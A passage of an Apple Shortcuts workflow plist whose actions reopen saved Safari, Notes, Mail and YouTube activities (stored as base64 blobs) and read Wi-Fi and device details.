				1AECAwQFBgcKWCR2ZXJzaW9uWSRhcmNoaXZlclQkdG9w
				WCRvYmplY3RzEgABhqBfEA9OU0tleWVkQXJjaGl2ZXLR
				CAlUcm9vdIABogsMVSRudWxsXxAkQTJBODlEN0ItQUVE
				QS00MEIzLUJGMkItOEMzNDA4ODM0MTVGCBEaJCkyN0lM
				UVNWXAAAAAAAAAEBAAAAAAAAAA0AAAAAAAAAAAAAAAAA
				AACD0lBRentfEBNOU011dGFibGVEaWN0aW9uYXJ5o3pS
				VNJLJH1+oIAS0lBRgIFVTlNTZXSigFTSUFGDhF8QElVB
				VXNlckFjdGl2aXR5SW5mb6KFVF8QElVBVXNlckFjdGl2
				aXR5SW5mbwAIABEAGgAkACkAMgA3AEkATABRAFMAagBw
				AK8AvADCAM0A4wD6AQIBHgE2AUkBWAFlAWoBcwGAAZoB
				ogGrAboBvwHUAesB9wIRAhgCJwIyAjcCRQJOAmICZAJm
				AmgCagJsAm4CbwJwAnICdAJ2AngCegJ8An4CgAKBAoMC
				hQKGAocCiQKLAo0CjwKRApMClQKXApgCnwKnArICswK0
				ArYCuwLGAs8C3ALfAugDHwMmAy4DOgM8Az4DQANmA2sD
				cQN0A5QDmQOhA6oDrAOxA7gDuwPAA8gGjwaRBpYGpAao
				BrYGvQbEBsYGyAbKBswGzgbrB54Howe5B70HwgfDB8UH
				ygfQB9MH2AftB/AAAAAAAAACAQAAAAAAAACGAAAAAAAA
				AAAAAAAAAAAIBQ==
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎routinehub.co/shortcut/3648</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.openurl</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>URL</string>
						<key>OutputUUID</key>
						<string>3C88AF24-3706-425B-AD9D-D96B18620163</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGYmNYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK4HCDc9Q0RKS05P
				U1hbXlUkbnVsbN8QFwkKCwwNDg8QERITFBUWFxgZGhsc
				HR4fICEiIyMlJiYjKSMjIy0uLzAjMiYjIyZccmVxdWly
				ZWRLZXlzVXRpdGxlWndlYnBhZ2VVUkxfEBNkeW5hbWlj
				QWN0aXZpdHlUeXBlXxAUcGVyc2lzdGVudElkZW50aWZp
				ZXJXb3B0aW9uc18QGWVsaWdpYmxlRm9yUHVibGljSW5k
				ZXhpbmdfEBVlbGlnaWJsZUZvclByZWRpY3Rpb25eZXhw
				aXJhdGlvbkRhdGVWJGNsYXNzXHBheWxvYWRFcnJvclR1
				dWlkWGtleXdvcmRzXGFjdGl2aXR5VHlwZV8QEmVsaWdp
				YmxlRm9ySGFuZG9mZld2ZXJzaW9uXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFedGVhbUlkZW50aWZpZXJUdHlw
				ZV8QFGVsaWdpYmxlRm9yUmVtaW5kZXJzW3JlZmVycmVy
				VVJMXWNvbnRlbnRBY3Rpb25fEBFlbGlnaWJsZUZvclNl
				YXJjaIALgASABYAAgACAAggIgACADYAAgACAAIAICRAB
				gAmAABABCIAAgAAI0zg5Ejo7PFdOUy5rZXlzWk5TLm9i
				amVjdHOgoIAD0j4/QEFaJGNsYXNzbmFtZVgkY2xhc3Nl
				c1xOU0RpY3Rpb25hcnmiQEJYTlNPYmplY3ReQWxleCBE
				LiAtIEhvc3TTRRJGI0hJV05TLmJhc2VbTlMucmVsYXRp
				dmWAAIAHgAZfEIxodHRwczovL20uc2lyaXVzeG0uY29t
				L3NlcnZsZXQvU2F0ZWxsaXRlP2M9U3RyZWFtSm9ja2V5
				JmNoaWxkcGFnZW5hbWU9U1hNL1N0cmVhbUpvY2tleS9N
				T0JfSG9zdERldGFpbCZjaWQ9MTI5Mzk3MDEwODY5MyZw
				YWdlbmFtZT1TWE0vV3JhcHBlctI+P0xNVU5TVVJMokxC
				XxAdTlNVc2VyQWN0aXZpdHlUeXBlQnJvd3NpbmdXZWLS
				UBJRUldOUy5kYXRhTxEDYWJwbGlzdDAw1AECAwQFBhUW
				WCR2ZXJzaW9uWCRvYmplY3RzWSRhcmNoaXZlclQkdG9w
				EgABhqCkBwgNDlUkbnVsbNIJCgsMWWNvbnRhaW5lclYk
				Y2xhc3OAAoADTxECMN66AAEAADACAADRAQAAHQAAAPDR
				AQAAAADRAQAAsAEAAAQAoAEAACUAAABfX2NsYXNzOkNT
				U2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVTZXQAWQEAAAQA
				KwEAAAYADwAAAHB1YmxpYy5jb250ZW50AAgBAAD//g4g
				cwBpAHIAaQB1AHMAeABtAC4AYwBvAG0ALwBzAGUAcgB2
				AGwAZQB0AC8AUwBhAHQAZQBsAGwAaQB0AGUAPwBjAD0A
				UwB0AHIAZQBhAG0ASgBvAGMAawBlAHkAJgBjAGgAaQBs
				AGQAcABhAGcAZQBuAGEAbQBlAD0AUwBYAE0ALwBTAHQA
				cgBlAGEAbQBKAG8AYwBrAGUAeQAvAE0ATwBCAF8ASABv
				AHMAdABEAGUAdABhAGkAbAAmAGMAaQBkAD0AMQAyADkA
				MwA5ADcAMAAxADAAOAA2ADkAMwAmAHAAYQBnAGUAbgBh
				AG0AZQA9AFMAWABNAC8AVwByAGEAcABwAGUAcgAAAAAA
				AAAAAAAABAAEAD4AAAAAAAAA4CkAAABvAAAA9RUAAAAA
				AAAA4AAAAABcAAAA9AwAAAAAAAwAAAABAAAAAAAnAAAA
				9AAAAADiUAAAAPGtAQAA8RIAa01ESXRlbUNvbnRlbnRU
				eXBlABEAa01ESXRlbUNvbnRlbnRVUkwAEgBrTURJdGVt
				RGVzY3JpcHRpb24AHgBrTURJdGVtUmVsYXRlZFVuaXF1
				ZUlkZW50aWZpZXIA0g8QERJaJGNsYXNzbmFtZVgkY2xh
				c3Nlc18QHENTU2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVT
				ZXSiExRfEBxDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRl
				U2V0WE5TT2JqZWN0XxAPTlNLZXllZEFyY2hpdmVy0RcY
				VHJvb3SAAQAIABEAGgAjAC0AMgA3ADwAQgBHAFEAWABa
				AFwCkAKVAqACqQLIAssC6gLzAwUDCAMNAAAAAAAAAgEA
				AAAAAAAAGQAAAAAAAAAAAAAAAAAAAw+ACtI+P1RVXU5T
				TXV0YWJsZURhdGGjVldCXU5TTXV0YWJsZURhdGFWTlNE
				YXRh0jkSWVqggAzSPj9cXVVOU1NldKJcQtI+P19gXxAS
				VUFVc2VyQWN0aXZpdHlJbmZvomFCXxASVUFVc2VyQWN0
				aXZpdHlJbmZvXxAPTlNLZXllZEFyY2hpdmVy0WRlVHJv
				b3SAAQAIABEAGgAjAC0AMgA3AEYATAB9AIoAkACbALEA
				yADQAOwBBAETARoBJwEsATUBQgFXAV8BeQGIAY0BpAGw
				Ab4B0gHUAdYB2AHaAdwB3gHfAeAB4gHkAeYB6AHqAewB
				7QHvAfEB8wH1AfYB+AH6AfsCAgIKAhUCFgIXAhkCHgIp
				AjICPwJCAksCWgJhAmkCdQJ3AnkCewMKAw8DFQMYAzgD
				PQNFBqoGrAaxBr8GwwbRBtgG3QbeBuAG5QbrBu4G8wcI
				BwsHIAcyBzUHOgAAAAAAAAIBAAAAAAAAAGYAAAAAAAAA
				AAAAAAAAAAc8
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.getwifi</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>FB8FCD19-B6F2-40F8-A421-BE039F7A003A</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilenotes</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGX2BYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK0HCDk/RUZHS1BT
				V1hbVSRudWxs3xAYCQoLDA0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjIyMmJygjKiMjIy4oMDEjMycjNiMnXHJlcXVp
				cmVkS2V5c1V0aXRsZVp3ZWJwYWdlVVJMXxATZHluYW1p
				Y0FjdGl2aXR5VHlwZV8QFHBlcnNpc3RlbnRJZGVudGlm
				aWVyV29wdGlvbnNfEBllbGlnaWJsZUZvclB1YmxpY0lu
				ZGV4aW5nXxAVZWxpZ2libGVGb3JQcmVkaWN0aW9uXmV4
				cGlyYXRpb25EYXRlViRjbGFzc1xwYXlsb2FkRXJyb3JU
				dXVpZFhrZXl3b3Jkc1xhY3Rpdml0eVR5cGVfEBJlbGln
				aWJsZUZvckhhbmRvZmZXdmVyc2lvbl8QF2NvbnRlbnRB
				dHRyaWJ1dGVTZXREYXRhXnRlYW1JZGVudGlmaWVyVHR5
				cGVfEBRlbGlnaWJsZUZvclJlbWluZGVyc1tyZWZlcnJl
				clVSTFdwYXlsb2FkXWNvbnRlbnRBY3Rpb25fEBFlbGln
				aWJsZUZvclNlYXJjaIAJgASAAIAAgACAAggJgACADIAA
				gACAAIAFCRABgAaAABABCIAAgAiAAAjTOjsSPD0+V05T
				LmtleXNaTlMub2JqZWN0c6CggAPSQEFCQ1okY2xhc3Nu
				YW1lWCRjbGFzc2VzXE5TRGljdGlvbmFyeaJCRFhOU09i
				amVjdG8QZQBaAGcAbQBzAHQAbAB3AHQAawBlAHQAawB0
				AGoAcwB0AGoAdABqAGUAdABrAHkAdABrAHQAawByAGoA
				cgBpAHcAdABpAGUAdABrAHIAdQBLAHIAeQBrAGQAeQBr
				AGsAdABqAG4AZgBqAGYAawB0AGsAeQBlAGsAegByAGwA
				cgBZAGwAZQB5AGsAUgB1AGwAeQBrAHQAagByAGoAdABq
				AHMAcgBqAHQAZQB5AGsAZQB0AGsAeQBkAGwAdQBqAHQA
				bwB5AGUAdABlICZfECJjb20uYXBwbGUubm90ZXMuYWN0
				aXZpdHkuZWRpdC1ub3Rl0kgSSUpXTlMuZGF0YU8RA6Ri
				cGxpc3QwMNQBAgMEBQYVFlgkdmVyc2lvblgkb2JqZWN0
				c1kkYXJjaGl2ZXJUJHRvcBIAAYagpAcIDQ5VJG51bGzS
				CQoLDFljb250YWluZXJWJGNsYXNzgAKAA08RAnPeugAB
				AABzAgAA/gEAAB0AAADw/gEAAAAA/gEAAN0BAAAEAM0B
				AAAlAAAAX19jbGFzczpDU1NlYXJjaGFibGVJdGVtQXR0
				cmlidXRlU2V0AIYBAAAFAE0BAAAHAA8AAABwdWJsaWMu
				Y29udGVudAABAQAAa3RsamFydWthcm95ZWpldGt3dGll
				aWV0a3J5b2FyeW9yeW9ldGp3dGlldGtleWtzdGtzdGtp
				b29vb29vb29vb29vb2lzaWVrZWtkeWtyeWt5ZWtleWty
				eXRzaXllb2FyeWthcnlvYXJ5b2FyeW9yeW9hdHVva3ll
				b3lka3lpdGt0a3lybHVhcm9ya3RqZ3JZbHJ5a1JZbGF1
				cmxGWWthZnlwYXJ5b2FyeW9hcnVveW95a3RydGlzcmlz
				cmlzdGl+IzkvNDg1Ojk1OC84NDI4NTM4NTM4NTg1MyU5
				fSU5Mzk5NjM5MzY5NDY4MzM2Li5cKiMre3srK3t7KyN7
				K10qXQAlAAAANEVDRTE0QTEtOTk1Ri00NzFDLUE1QzQt
				QkZDREJERTdDRUM5AAAAAAABAAMAAwADAAMABQAWAAAA
				XAAAAPRUAAAAdAEAAPQ/AAAAbwAAAPQrAAAAAAAAAOAA
				AAAAAAAAAOAMAAAAAAAMAAAAAQAAAAAAJwAAAPQAAAAA
				4lAAAADx2gEAAPETAGtNREl0ZW1UaHVtYm5haWxVUkwA
				EgBrTURJdGVtQ29udGVudFR5cGUAEQBrTURJdGVtQ29u
				dGVudFVSTAASAGtNREl0ZW1EZXNjcmlwdGlvbgAeAGtN
				REl0ZW1SZWxhdGVkVW5pcXVlSWRlbnRpZmllcgDSDxAR
				ElokY2xhc3NuYW1lWCRjbGFzc2VzXxAcQ1NTZWFyY2hh
				YmxlSXRlbUF0dHJpYnV0ZVNldKITFF8QHENTU2VhcmNo
				YWJsZUl0ZW1BdHRyaWJ1dGVTZXRYTlNPYmplY3RfEA9O
				U0tleWVkQXJjaGl2ZXLRFxhUcm9vdIABAAgAEQAaACMA
				LQAyADcAPABCAEcAUQBYAFoAXALTAtgC4wLsAwsDDgMt
				AzYDSANLA1AAAAAAAAACAQAAAAAAAAAZAAAAAAAAAAAA
				AAAAAAADUoAH0kBBTE1dTlNNdXRhYmxlRGF0YaNOT0Rd
				TlNNdXRhYmxlRGF0YVZOU0RhdGHSSBJRSk8QME1QAwWB
				pHV1aWTZJDRFQ0UxNEExLTk5NUYtNDcxQy1BNUM0LUJG
				Q0RCREU3Q0VDOYAH0jsSVFahVYAKgAtUdXVpZNJAQVla
				VU5TU2V0ollE0kBBXF1fEBJVQVVzZXJBY3Rpdml0eUlu
				Zm+iXkRfEBJVQVVzZXJBY3Rpdml0eUluZm9fEA9OU0tl
				eWVkQXJjaGl2ZXLRYWJUcm9vdIABAAgAEQAaACMALQAy
				ADcARQBLAH4AiwCRAJwAsgDJANEA7QEFARQBGwEoAS0B
				NgFDAVgBYAF6AYkBjgGlAbEBuQHHAdsB3QHfAeEB4wHl
				AecB6AHpAesB7QHvAfEB8wH1AfYB+AH6AfwB/gH/AgEC
				AwIFAgYCDQIVAiACIQIiAiQCKQI0Aj0CSgJNAlYDIwNI
				A00DVQb9Bv8HBAcSBxYHJAcrBzAHYwdlB2oHbAduB3AH
				dQd6B4AHgweIB50HoAe1B8cHygfPAAAAAAAAAgEAAAAA
				AAAAYwAAAAAAAAAAAAAAAAAAB9E=
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.getmyworkflows</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>17FB09DD-0DAD-4759-ABD9-967F2390A003</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGYmNYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK4HCDc9Q0RKS05P
				U1hbXlUkbnVsbN8QFwkKCwwNDg8QERITFBUWFxgZGhsc
				HR4fICEiIyMlJicjKSMjIy0nLzAjMiYjIyZccmVxdWly
				ZWRLZXlzVXRpdGxlWndlYnBhZ2VVUkxfEBNkeW5hbWlj
				QWN0aXZpdHlUeXBlXxAUcGVyc2lzdGVudElkZW50aWZp
				ZXJXb3B0aW9uc18QGWVsaWdpYmxlRm9yUHVibGljSW5k
				ZXhpbmdfEBVlbGlnaWJsZUZvclByZWRpY3Rpb25eZXhw
				aXJhdGlvbkRhdGVWJGNsYXNzXHBheWxvYWRFcnJvclR1
				dWlkWGtleXdvcmRzXGFjdGl2aXR5VHlwZV8QEmVsaWdp
				YmxlRm9ySGFuZG9mZld2ZXJzaW9uXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFedGVhbUlkZW50aWZpZXJUdHlw
				ZV8QFGVsaWdpYmxlRm9yUmVtaW5kZXJzW3JlZmVycmVy
				VVJMXWNvbnRlbnRBY3Rpb25fEBFlbGlnaWJsZUZvclNl
				YXJjaIALgASABYAAgACAAggJgACADYAAgACAAIAICRAB
				gAmAABABCIAAgAAI0zg5Ejo7PFdOUy5rZXlzWk5TLm9i
				amVjdHOgoIAD0j4/QEFaJGNsYXNzbmFtZVgkY2xhc3Nl
				c1xOU0RpY3Rpb25hcnmiQEJYTlNPYmplY3RfEFhEb3du
				bG9hZCBIb3dhcmQgU3Rlcm4gLSAyMDE5MDQxMCAtIFNs
				ZWVwIFByb2JsZW1zOyBPbiBBaXIgU2NyZXcgVXBzOyBD
				aGVsc2VhIEhhbmRsZXIubXAz00USRiNISVdOUy5iYXNl
				W05TLnJlbGF0aXZlgACAB4AGXxAgaHR0cHM6Ly92aXBz
				aGFyZS5jby91Lzk3bXlkZTlmMm7SPj9MTVVOU1VSTKJM
				Ql8QHU5TVXNlckFjdGl2aXR5VHlwZUJyb3dzaW5nV2Vi
				0lASUVJXTlMuZGF0YU8RAq5icGxpc3QwMNQBAgMEBQYV
				FlgkdmVyc2lvblgkb2JqZWN0c1kkYXJjaGl2ZXJUJHRv
				cBIAAYagpAcIDQ5VJG51bGzSCQoLDFljb250YWluZXJW
				JGNsYXNzgAKAA08RAX3eugABAAB9AQAACAEAAB0AAADw
				CAEAAAAACAEAAOcAAAAEANcAAAAlAAAAX19jbGFzczpD
				U1NlYXJjaGFibGVJdGVtQXR0cmlidXRlU2V0AJAAAAAF
				AFcAAAAHAA8AAABwdWJsaWMuY29udGVudAA0AAAA//4O
				IHYAaQBwAHMAaABhAHIAZQAuAGMAbwAvAHUALwA5ADcA
				bQB5AGQAZQA5AGYAMgBuAAAAAAABAAMAAwADAAMABQAW
				AAAAXAAAAPRUAAAAAAAAAOA/AAAAbwAAAPUrAAAAAAAA
				AOAAAAAAAAAAAOAMAAAAAAAMAAAAAQAAAAAAJwAAAPQA
				AAAA4lAAAADx5AAAAPETAGtNREl0ZW1UaHVtYm5haWxV
				UkwAEgBrTURJdGVtQ29udGVudFR5cGUAEQBrTURJdGVt
				Q29udGVudFVSTAASAGtNREl0ZW1EZXNjcmlwdGlvbgAe
				AGtNREl0ZW1SZWxhdGVkVW5pcXVlSWRlbnRpZmllcgDS
				DxARElokY2xhc3NuYW1lWCRjbGFzc2VzXxAcQ1NTZWFy
				Y2hhYmxlSXRlbUF0dHJpYnV0ZVNldKITFF8QHENTU2Vh
				cmNoYWJsZUl0ZW1BdHRyaWJ1dGVTZXRYTlNPYmplY3Rf
				EA9OU0tleWVkQXJjaGl2ZXLRFxhUcm9vdIABAAgAEQAa
				ACMALQAyADcAPABCAEcAUQBYAFoAXAHdAeIB7QH2AhUC
				GAI3AkACUgJVAloAAAAAAAACAQAAAAAAAAAZAAAAAAAA
				AAAAAAAAAAACXIAK0j4/VFVdTlNNdXRhYmxlRGF0YaNW
				V0JdTlNNdXRhYmxlRGF0YVZOU0RhdGHSORJZWqCADNI+
				P1xdVU5TU2V0olxC0j4/X2BfEBJVQVVzZXJBY3Rpdml0
				eUluZm+iYUJfEBJVQVVzZXJBY3Rpdml0eUluZm9fEA9O
				U0tleWVkQXJjaGl2ZXLRZGVUcm9vdIABAAgAEQAaACMA
				LQAyADcARgBMAH0AigCQAJsAsQDIANAA7AEEARMBGgEn
				ASwBNQFCAVcBXwF5AYgBjQGkAbABvgHSAdQB1gHYAdoB
				3AHeAd8B4AHiAeQB5gHoAeoB7AHtAe8B8QHzAfUB9gH4
				AfoB+wICAgoCFQIWAhcCGQIeAikCMgI/AkICSwKmAq0C
				tQLBAsMCxQLHAuoC7wL1AvgDGAMdAyUF1wXZBd4F7AXw
				Bf4GBQYKBgsGDQYSBhgGGwYgBjUGOAZNBl8GYgZnAAAA
				AAAAAgEAAAAAAAAAZgAAAAAAAAAAAAAAAAAABmk=
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.getdevicedetails</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>8366B249-6AF4-491F-B714-8D41ADF6B8B8</string>
				<key>WFDeviceDetail</key>
				<string>System Version</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilemail</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBMLDElPVVZXW15iZ21u
				b3J3eHl8VSRudWxs3xAeDQ4PEBESExQVFhcYGRobHB0e
				HyAhIiMkJSYnKCkqKywtLS0wMTItLS0tLTgxOjItPT4y
				QC0tLS1FLUcyXHJlcXVpcmVkS2V5c1V0aXRsZVp3ZWJw
				YWdlVVJMXxATZHluYW1pY0FjdGl2aXR5VHlwZV8QFHBl
				cnNpc3RlbnRJZGVudGlmaWVyV29wdGlvbnNfEBllbGln
				aWJsZUZvclB1YmxpY0luZGV4aW5nXxAVZWxpZ2libGVG
				b3JQcmVkaWN0aW9uXxAQYnVuZGxlSWRlbnRpZmllcl5l
				eHBpcmF0aW9uRGF0ZVxwYXlsb2FkRXJyb3JUdXVpZFhr
				ZXl3b3Jkc1xhY3Rpdml0eVR5cGVYaXNBY3RpdmVXdmVy
				c2lvbl8QEmVsaWdpYmxlRm9ySGFuZG9mZl50ZWFtSWRl
				bnRpZmllclR0eXBlViRjbGFzc18QFGVsaWdpYmxlRm9y
				UmVtaW5kZXJzV3BheWxvYWRbcmVmZXJyZXJVUkxfEBd0
				YXJnZXRDb250ZW50SWRlbnRpZmllcl5wZWVyRGV2aWNl
				VHlwZVpwZWVyRGV2aWNlVHdoZW5dY29udGVudEFjdGlv
				blhwYXlsb2Fkc18QEWVsaWdpYmxlRm9yU2VhcmNogA6A
				BIAAgACAAIACCAmAAIAAgACAAIAAgAUIEAEJgAAQAYAS
				CYAIgACAAIAAgACABoAAgAoJ00pLIExNTldOUy5rZXlz
				Wk5TLm9iamVjdHOgoIAD0lBRUlNaJGNsYXNzbmFtZVgk
				Y2xhc3Nlc1xOU0RpY3Rpb25hcnmiUlRYTlNPYmplY3RT
				VklQXxAWY29tLmFwcGxlLm1haWwubWFpbGJveNJYIFla
				V05TLnRpbWUjQcGot64VMbqAB9JQUVxdVk5TRGF0ZaJc
				VNJfIGBhV05TLmRhdGFPEEtNUAMFgrBtYWlsQWN0aXZp
				dHlUeXBltmNvbS5hcHBsZS5tYWlsLm1haWxib3iyc3Bl
				Y2lhbE1haWxib3hUeXBlqlZJUE1haWxib3iACdJQUWNk
				XU5TTXV0YWJsZURhdGGjZWZUXU5TTXV0YWJsZURhdGFW
				TlNEYXRh00pLIGhqbKFpgAuha4AMgA1fEBpVQUludGVu
				dHNJZGVudGlmaWVyUGF5bG9hZE8QsGJwbGlzdDAw1AEC
				AwQFBgcKWCR2ZXJzaW9uWSRhcmNoaXZlclQkdG9wWCRv
				YmplY3RzEgABhqBfEA9OU0tleWVkQXJjaGl2ZXLRCAlU
				cm9vdIABogsMVSRudWxsXxAkQ0RDRTgxQTgtMEY1NC00
				MTczLTlDQUUtMzdBMzcxMzdGREYwCBEaJCkyN0lMUVNW
				XAAAAAAAAAEBAAAAAAAAAA0AAAAAAAAAAAAAAAAAAACD
				0lBRcHFfEBNOU011dGFibGVEaWN0aW9uYXJ5o3BSVNJL
				IHN2onR1gA+AEIARXxAQbWFpbEFjdGl2aXR5VHlwZV8Q
				EnNwZWNpYWxNYWlsYm94VHlwZdJQUXp7VU5TU2V0onpU
				0lBRfX5fEBJVQVVzZXJBY3Rpdml0eUluZm+if1RfEBJV
				QVVzZXJBY3Rpdml0eUluZm8ACAARABoAJAApADIANwBJ
				AEwAUQBTAGkAbwCuALsAwQDMAOIA+QEBAR0BNQFIAVcB
				ZAFpAXIBfwGIAZABpQG0AbkBwAHXAd8B6wIFAhQCHwIk
				AjICOwJPAlECUwJVAlcCWQJbAlwCXQJfAmECYwJlAmcC
				aQJqAmwCbQJvAnECcwJ0AnYCeAJ6AnwCfgKAAoIChAKF
				AowClAKfAqACoQKjAqgCswK8AskCzALVAtkC8gL3Av8D
				CAMKAw8DFgMZAx4DJgN0A3YDewOJA40DmwOiA6kDqwOt
				A68DsQOzA9AEgwSIBJ4EogSnBKoErASuBLAEwwTYBN0E
				4wTmBOsFAAUDAAAAAAAAAgEAAAAAAAAAgAAAAAAAAAAA
				AAAAAAAABRg=
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.vibrate</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.google.ios.youtube</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGbW5YJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK8QEQcIOT9FRkdL
				UFhZWl1gY2ZpVSRudWxs3xAYCQoLDA0ODxAREhMUFRYX
				GBkaGxwdHh8gISIjIyMmJygjKiMjIy4oMDEjMygjIzco
				XHJlcXVpcmVkS2V5c1V0aXRsZVp3ZWJwYWdlVVJMXxAT
				ZHluYW1pY0FjdGl2aXR5VHlwZV8QFHBlcnNpc3RlbnRJ
				ZGVudGlmaWVyV29wdGlvbnNfEBllbGlnaWJsZUZvclB1
				YmxpY0luZGV4aW5nXxAVZWxpZ2libGVGb3JQcmVkaWN0
				aW9uXmV4cGlyYXRpb25EYXRlViRjbGFzc1xwYXlsb2Fk
				RXJyb3JUdXVpZFhrZXl3b3Jkc1xhY3Rpdml0eVR5cGVf
				EBJlbGlnaWJsZUZvckhhbmRvZmZXdmVyc2lvbl8QF2Nv
				bnRlbnRBdHRyaWJ1dGVTZXREYXRhXnRlYW1JZGVudGlm
				aWVyVHR5cGVfEBRlbGlnaWJsZUZvclJlbWluZGVyc1ty
				ZWZlcnJlclVSTF1jb250ZW50QWN0aW9uWHBheWxvYWRz
				XxARZWxpZ2libGVGb3JTZWFyY2iADoAEgACAAIAAgAII
				CYAAgBCAAIAAgACABQkQAYAGgAAQAQmAAIAAgAgJ0zo7
				Ejw9PldOUy5rZXlzWk5TLm9iamVjdHOgoIAD0kBBQkNa
				JGNsYXNzbmFtZVgkY2xhc3Nlc1xOU0RpY3Rpb25hcnmi
				QkRYTlNPYmplY3RfEBdPcGVuIFN1YnNjcmlwdGlvbnMg
				cGFnZV8QJGNvbS5nb29nbGUuaW9zLnlvdXR1YmUuc2ly
				aS5zdWJzLXRhYtJIEklKV05TLmRhdGFPEQIsYnBsaXN0
				MDDUAQIDBAUGFRZYJHZlcnNpb25YJG9iamVjdHNZJGFy
				Y2hpdmVyVCR0b3ASAAGGoKQHCA0OVSRudWxs0gkKCwxZ
				Y29udGFpbmVyViRjbGFzc4ACgANPEPzeugABAAD8AAAA
				0gAAAB0AAADw0gAAAAAA0gAAALEAAAAEAKEAAAAlAAAA
				X19jbGFzczpDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRl
				U2V0AFoAAAACAEgAAAABACgAAABPcGVuIFlvdVR1YmUg
				dG8geW91ciBTdWJzY3JpcHRpb25zIHBhZ2UADAAAAHB1
				YmxpYy5pdGVtAAAAAgAVAAAAiAAAAPQAAAAAXAAAAPQM
				AAAAAAAMAAAAAQAAAAAAJwAAAPQAAAAA4lAAAADxrgAA
				APESAGtNREl0ZW1EZXNjcmlwdGlvbgASAGtNREl0ZW1D
				b250ZW50VHlwZQDSDxARElokY2xhc3NuYW1lWCRjbGFz
				c2VzXxAcQ1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNl
				dKITFF8QHENTU2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVT
				ZXRYTlNPYmplY3RfEA9OU0tleWVkQXJjaGl2ZXLRFxhU
				cm9vdIABAAgAEQAaACMALQAyADcAPABCAEcAUQBYAFoA
				XAFbAWABawF0AZMBlgG1Ab4B0AHTAdgAAAAAAAACAQAA
				AAAAAAAZAAAAAAAAAAAAAAAAAAAB2oAH0kBBTE1dTlNN
				dXRhYmxlRGF0YaNOT0RdTlNNdXRhYmxlRGF0YVZOU0Rh
				dGHTOjsSUVRXolJTgAmACqJVVoALgAyADV8QJFVBSU5T
				dWdnZXN0ZWRJbnZvY2F0aW9uUGhyYXNlUGF5bG9hZF8Q
				GlVBSW50ZW50c0lkZW50aWZpZXJQYXlsb2Fk0kgSW0pP
				EBdPcGVuIFN1YnNjcmlwdGlvbnMgcGFnZYAH0kgSXkpP
				ELBicGxpc3QwMNQBAgMEBQYJClgkdmVyc2lvblgkb2Jq
				ZWN0c1kkYXJjaGl2ZXJUJHRvcBIAAYagogcIVSRudWxs
				XxAkQTJEM0Y3NTktRjZERC00RTJGLTgzNzItNTY0MEI4
				RTVFRkM3XxAPTlNLZXllZEFyY2hpdmVy0QsMVHJvb3SA
				AQgRGiMtMjc6QGd5fIEAAAAAAAABAQAAAAAAAAANAAAA
				AAAAAAAAAAAAAAAAg4AH0kBBYWJfEBNOU011dGFibGVE
				aWN0aW9uYXJ5o2FCRNI7EmRloIAP0kBBZ2hVTlNTZXSi
